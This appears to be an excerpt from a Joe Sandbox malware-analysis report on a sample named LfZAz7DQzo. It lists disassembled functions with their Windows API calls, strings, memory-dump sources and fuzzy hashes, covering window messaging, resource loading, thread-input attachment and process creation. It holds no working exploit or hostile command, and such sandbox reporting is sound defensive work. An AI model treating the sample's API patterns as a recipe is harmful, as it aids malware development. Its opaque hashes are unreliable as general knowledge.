                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Error$Mode$DiskFreeLastSpace
                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                        • API String ID: 4194297153-14809454
                                        • Opcode ID: 316932d2a04b5d1252692caf6f12b3545f4dd60d74692656f2cd5f58344706d2
                                        • Instruction ID: 4ef3e7b4988b4627ba7c8799bd39876a346974160d30d815ed7e53b4373b9600
                                        • Opcode Fuzzy Hash: 316932d2a04b5d1252692caf6f12b3545f4dd60d74692656f2cd5f58344706d2
                                        • Instruction Fuzzy Hash: E431C035A0024C9FDB10EFA6C885ABFB7B4FF48714F14512AE405E7291DB71D942DB41
                                        Function 00ED9471 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00E87F41: _memmove.LIBCMT ref: 00E87F82
                                          • Part of subcall function 00EDB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00EDB0E7
                                        • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00ED94F6
                                        • GetDlgCtrlID.USER32 ref: 00ED9501
                                        • GetParent.USER32 ref: 00ED951D
                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00ED9520
                                        • GetDlgCtrlID.USER32(?), ref: 00ED9529
                                        • GetParent.USER32(?), ref: 00ED9545
                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00ED9548
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: MessageSend$CtrlParent$ClassName_memmove
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 1536045017-1403004172
                                        • Opcode ID: 61ef0bb380928030f1946658aaef31ae5fddcbb882dd653d3d8fcb909b5db24f
                                        • Instruction ID: aaf28d3aa9866752c8f30eec28120043788f5c9a19a19a26ae1b793d504be227
                                        • Opcode Fuzzy Hash: 61ef0bb380928030f1946658aaef31ae5fddcbb882dd653d3d8fcb909b5db24f
                                        • Instruction Fuzzy Hash: B621C474A00108BBCF15AF64CCC5DFEBBB4FF45310F101266B565A72A2DB75991ADB20
                                        Function 00ED955C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00E87F41: _memmove.LIBCMT ref: 00E87F82
                                          • Part of subcall function 00EDB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00EDB0E7
                                        • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00ED95DF
                                        • GetDlgCtrlID.USER32 ref: 00ED95EA
                                        • GetParent.USER32 ref: 00ED9606
                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00ED9609
                                        • GetDlgCtrlID.USER32(?), ref: 00ED9612
                                        • GetParent.USER32(?), ref: 00ED962E
                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00ED9631
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: MessageSend$CtrlParent$ClassName_memmove
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 1536045017-1403004172
                                        • Opcode ID: f22e1ae794d0a30920232adf77b2d91bc1937992b8869f0644869f92a16e0a4a
                                        • Instruction ID: c5278392cc6f774ff478532acb6ddd642a22bde74be7b5aa1d5d056adfb92c30
                                        • Opcode Fuzzy Hash: f22e1ae794d0a30920232adf77b2d91bc1937992b8869f0644869f92a16e0a4a
                                        • Instruction Fuzzy Hash: 8421F874A00108BBDF14AB60CCC5EFEBBB4FF44300F141156F561A72A2DB76955ADB20
                                        Function 00ED9645 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetParent.USER32 ref: 00ED9651
                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 00ED9666
                                        • _wcscmp.LIBCMT ref: 00ED9678
                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00ED96F3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: ClassMessageNameParentSend_wcscmp
                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                        • API String ID: 1704125052-3381328864
                                        • Opcode ID: 9800c017fdf03b7605f3b8352ec34dfdc6c4872e92df2214b9d5c56855de3326
                                        • Instruction ID: 7562a13592ebfbef5320c4dcc68d31da4c76f9d9a3a5e6066a37505703795f2d
                                        • Opcode Fuzzy Hash: 9800c017fdf03b7605f3b8352ec34dfdc6c4872e92df2214b9d5c56855de3326
                                        • Instruction Fuzzy Hash: BC112336248307BAEA112630DC06DA6B7DCDB15334F201127F910B91E2FEE2E9426A59
                                        Function 00EF8BC0 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VariantInit.OLEAUT32(?), ref: 00EF8BEC
                                        • CoInitialize.OLE32(00000000), ref: 00EF8C19
                                        • CoUninitialize.COMBASE ref: 00EF8C23
                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 00EF8D23
                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 00EF8E50
                                        • CoGetInstanceFromFile.COMBASE(00000000,?,00000000,00000015,00000002,?,00000001,00F12C0C), ref: 00EF8E84
                                        • CoGetObject.OLE32(?,00000000,00F12C0C,?), ref: 00EF8EA7
                                        • SetErrorMode.KERNEL32(00000000), ref: 00EF8EBA
                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00EF8F3A
                                        • VariantClear.OLEAUT32(?), ref: 00EF8F4A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                        • String ID:
                                        • API String ID: 2395222682-0
                                        • Opcode ID: 5ef7931747b9911e79d6aadfc9f4caad8c99011e6fb3f3b1bcfcd66075972180
                                        • Instruction ID: a1f32b113c3015fc1cc2dbfa51d8efdf878eb66317f0e5a565e5073ecdad4fec
                                        • Opcode Fuzzy Hash: 5ef7931747b9911e79d6aadfc9f4caad8c99011e6fb3f3b1bcfcd66075972180
                                        • Instruction Fuzzy Hash: 46C13471608309AFD700EF64C98496BB7E9FF88348F00596DF689AB251DB31ED05CB52
                                        Function 00EE4189 Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __swprintf.LIBCMT ref: 00EE419D
                                        • __swprintf.LIBCMT ref: 00EE41AA
                                          • Part of subcall function 00EA38D8: __woutput_l.LIBCMT ref: 00EA3931
                                        • FindResourceW.KERNEL32(?,?,0000000E), ref: 00EE41D4
                                        • LoadResource.KERNEL32(?,00000000), ref: 00EE41E0
                                        • LockResource.KERNEL32(00000000), ref: 00EE41ED
                                        • FindResourceW.KERNEL32(?,?,00000003), ref: 00EE420D
                                        • LoadResource.KERNEL32(?,00000000), ref: 00EE421F
                                        • SizeofResource.KERNEL32(?,00000000), ref: 00EE422E
                                        • LockResource.KERNEL32(?), ref: 00EE423A
                                        • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00EE429B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                        • String ID:
                                        • API String ID: 1433390588-0
                                        • Opcode ID: 4bb66aa96bf8c14aeb5e8febeb5e3c5d2d4de6d1d9c1f7ed350c2bdb6a995ff6
                                        • Instruction ID: 988c4e552b307879c6b8a7d4bb46889d1d24a84a4f8f3223722391db45922dd2
                                        • Opcode Fuzzy Hash: 4bb66aa96bf8c14aeb5e8febeb5e3c5d2d4de6d1d9c1f7ed350c2bdb6a995ff6
                                        • Instruction Fuzzy Hash: 1531B0B5A0525EABCB119FA1DD48EBF7BACFF09301F044565F901E61A0D730DA51ABA0
                                        Function 00EE16DE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentThreadId.KERNEL32 ref: 00EE1700
                                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00EE0778,?,00000001), ref: 00EE1714
                                        • GetWindowThreadProcessId.USER32(00000000), ref: 00EE171B
                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00EE0778,?,00000001), ref: 00EE172A
                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00EE173C
                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00EE0778,?,00000001), ref: 00EE1755
                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00EE0778,?,00000001), ref: 00EE1767
                                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00EE0778,?,00000001), ref: 00EE17AC
                                        • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00EE0778,?,00000001), ref: 00EE17C1
                                        • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00EE0778,?,00000001), ref: 00EE17CC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                        • String ID:
                                        • API String ID: 2156557900-0
                                        • Opcode ID: 1fbac4b00369a0db474fc7e9d5acf5f26c942a95b3b6b33da202b9a2f782905c
                                        • Instruction ID: dc41ce19bd3f6a03feea2fa88934285415ba002dc09a4b1ff97ec1709abd003b
                                        • Opcode Fuzzy Hash: 1fbac4b00369a0db474fc7e9d5acf5f26c942a95b3b6b33da202b9a2f782905c
                                        • Instruction Fuzzy Hash: 9431B47560034CBBDB21EF15DC84B6937A9AB1BB65F104056FC00E62A0D770AD889F90
                                        Function 00E8FBBD Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                                        Download Yara Rule
                                        APIs
                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00E8FC06
                                        • OleUninitialize.OLE32(?,00000000), ref: 00E8FCA5
                                        • UnregisterHotKey.USER32(?), ref: 00E8FDFC
                                        • DestroyWindow.USER32(?), ref: 00EC4A00
                                        • FreeLibrary.KERNEL32(?), ref: 00EC4A65
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00EC4A92
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                        • String ID: close all
                                        • API String ID: 469580280-3243417748
                                        • Opcode ID: e63f6ff2ca23665726f2ed48a88540db44bfaa47d007fa87f76fa6be8f5d989c
                                        • Instruction ID: a663c923887863b20051d080a4230a03e00b7d0aab834883261afac0b3d1669d
                                        • Opcode Fuzzy Hash: e63f6ff2ca23665726f2ed48a88540db44bfaa47d007fa87f76fa6be8f5d989c
                                        • Instruction Fuzzy Hash: 5BA158717012128FCB29EF14C5A5F69F7A4AF04704F1462ADE90EBB2A2DB31AD16CF54
                                        Function 00EDA693 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                        Download Yara Rule
                                        APIs
                                        • EnumChildWindows.USER32(?,00EDAA64), ref: 00EDA9A2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: ChildEnumWindows
                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                        • API String ID: 3555792229-1603158881
                                        • Opcode ID: b5753a4317740d054d008f446e3f553443e14ece2294f87629bf484457eee98a
                                        • Instruction ID: bdd5cfad724fd4c98f5f6a8c8d5a2389e5d2853583e1b8e56c4694b55134e366
                                        • Opcode Fuzzy Hash: b5753a4317740d054d008f446e3f553443e14ece2294f87629bf484457eee98a
                                        • Instruction Fuzzy Hash: 9291C671900606DBCB08DF60C491BE9FBB5FF44314F18A12AE899B7241DF70AB5ADB91
                                        Function 00E82E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SetWindowLongW.USER32(?,000000EB), ref: 00E82EAE
                                          • Part of subcall function 00E81DB3: GetClientRect.USER32(?,?), ref: 00E81DDC
                                          • Part of subcall function 00E81DB3: GetWindowRect.USER32(?,?), ref: 00E81E1D
                                          • Part of subcall function 00E81DB3: ScreenToClient.USER32(?,?), ref: 00E81E45
                                        • GetDC.USER32 ref: 00EBCF82
                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00EBCF95
                                        • SelectObject.GDI32(00000000,00000000), ref: 00EBCFA3
                                        • SelectObject.GDI32(00000000,00000000), ref: 00EBCFB8
                                        • ReleaseDC.USER32(?,00000000), ref: 00EBCFC0
                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00EBD04B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                        • String ID: U
                                        • API String ID: 4009187628-3372436214
                                        • Opcode ID: 694e9c6916c7a448efaa195a3ea674a0b6eb72cc2d44308848c04faf8eed026c
                                        • Instruction ID: ffc4f60a85510c22d87aea4cf3cc4b477e8a11d0cf8d33941ee549567a630f03
                                        • Opcode Fuzzy Hash: 694e9c6916c7a448efaa195a3ea674a0b6eb72cc2d44308848c04faf8eed026c
                                        • Instruction Fuzzy Hash: 1971C530504209DFCF219F64CC80AFB7BB6FF49358F2452A9EE59B61A5D7318841EB61
                                        Function 00F06FEF Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 143windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00F07093
                                        • SendMessageW.USER32(?,00001036,00000000,?), ref: 00F070A7
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00F070C1
                                        • _wcscat.LIBCMT ref: 00F0711C
                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 00F07133
                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00F07161
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window_wcscat
                                        • String ID: -----$SysListView32
                                        • API String ID: 307300125-3975388722
                                        • Opcode ID: e13c337afa03cf3b8c74932264f0acb85ffcd8f11a37628fc18a1e628bbeb600
                                        • Instruction ID: c467b74d2ebf6b4db158310c3378800048563b7f67c9602b5b669668110ff6a1
                                        • Opcode Fuzzy Hash: e13c337afa03cf3b8c74932264f0acb85ffcd8f11a37628fc18a1e628bbeb600
                                        • Instruction Fuzzy Hash: F6417271D04308ABDB219F64CC85BEA77E8EF08360F10456AF944E71D1D772AD85AB50
                                        Function 00EF8F5B Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00F0F910), ref: 00EF903D
                                        • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00F0F910), ref: 00EF9071
                                        • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00EF91EB
                                        • SysFreeString.OLEAUT32(?), ref: 00EF9215
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                        • String ID:
                                        • API String ID: 560350794-0
                                        • Opcode ID: df5980551ae088624b5b545b04330649923e9f9dddf3a07889361a14547a55b7
                                        • Instruction ID: 1251dfc0cfa93239cc860a7c661e615617e91a2e7bb69b446d71ce18ec708f4d
                                        • Opcode Fuzzy Hash: df5980551ae088624b5b545b04330649923e9f9dddf3a07889361a14547a55b7
                                        • Instruction Fuzzy Hash: 16F11971A00109EFDB14DF94C888EBEB7B9FF89314F109099FA55AB251DB31AE45CB50
                                        Function 00EFF9A8 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _memset.LIBCMT ref: 00EFF9C9
                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00EFFB5C
                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00EFFB80
                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00EFFBC0
                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00EFFBE2
                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00EFFD5E
                                        • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00EFFD90
                                        • CloseHandle.KERNEL32(?), ref: 00EFFDBF
                                        • CloseHandle.KERNEL32(?), ref: 00EFFE36
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                        • String ID:
                                        • API String ID: 4090791747-0
                                        • Opcode ID: 789c432544e7cfdd771a2cf71c3ad3a5ef956e260b324402039729f38caee9d1
                                        • Instruction ID: 831285150a81f5312bb3ceebb1194a4331fef9db3f2ffa4c7b436364e2b20616
                                        • Opcode Fuzzy Hash: 789c432544e7cfdd771a2cf71c3ad3a5ef956e260b324402039729f38caee9d1
                                        • Instruction Fuzzy Hash: 52E1C3316043449FCB14EF24C891B7ABBE0BF89354F14946DF999AB2A2DB31EC45CB52
                                        Function 00E8201B Relevance: 13.7, APIs: 9, Instructions: 170timeCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00E81B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00E82036,?,00000000,?,?,?,?,00E816CB,00000000,?), ref: 00E81B9A
